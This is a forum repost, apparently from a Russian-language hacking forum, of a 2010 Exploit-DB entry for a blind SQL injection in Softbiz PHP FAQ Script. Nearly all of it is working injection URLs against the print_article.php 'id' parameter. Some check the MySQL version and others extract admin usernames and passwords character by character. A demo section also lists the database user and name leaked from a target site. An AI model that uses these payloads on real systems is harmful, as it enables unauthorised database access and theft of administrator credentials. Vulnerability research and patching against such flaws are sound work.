Exploit Softbiz PHP FAQ Script - Blind SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
13991
Проверка EDB
  1. Пройдено
Автор
SANGTEAMTHAM
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-06-22
Код:
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$  Softbiz PHP FAQ Script Blind SQL Vulnerability                             $
$  Author : Sangteamtham                                                                    $
$  Home  : Hcegroup.net & vnbrain.net                                                 $
$  Download :http://www.softbizscripts.com/FAQ-script-features.php   $
$                   					           $
$***********************************************************
$
$ check version : http://server.com/fag/print_article.php?id=[id number]+and substring(version(),1,1)=4 
$                        http://server.com/fag/print_article.php?id=[id number]+and substring(version(),1,1)=5
$                        http://server.com/fag/print_article.php?id=[idnumber]+and+(select+substring(concat(1,password_column),1,1)+from+admin_info_table+limit+0,1)=1/*  
$                        http://server.com/fag/print_article.php?id=[idnumber]+and+(select+substring(concat(1,username_column),1,1)+from+admin_info_table+limit+0,1)=1/*
$  note: password_column,username_column,admin_info_table depend on the database installed
$***********************************************************
$ Demo: 
$ In the demo site : 
$ 
$ Exploit:http://server/faq/print_article.php?id=5+and substring(version(),1,1)=5 
$ 
$ MySQL version: 5.0.81-community
$ User: softbiz_kuber@localhost
$ Dataabase: softbiz_faq
 
Источник
www.exploit-db.com

Похожие темы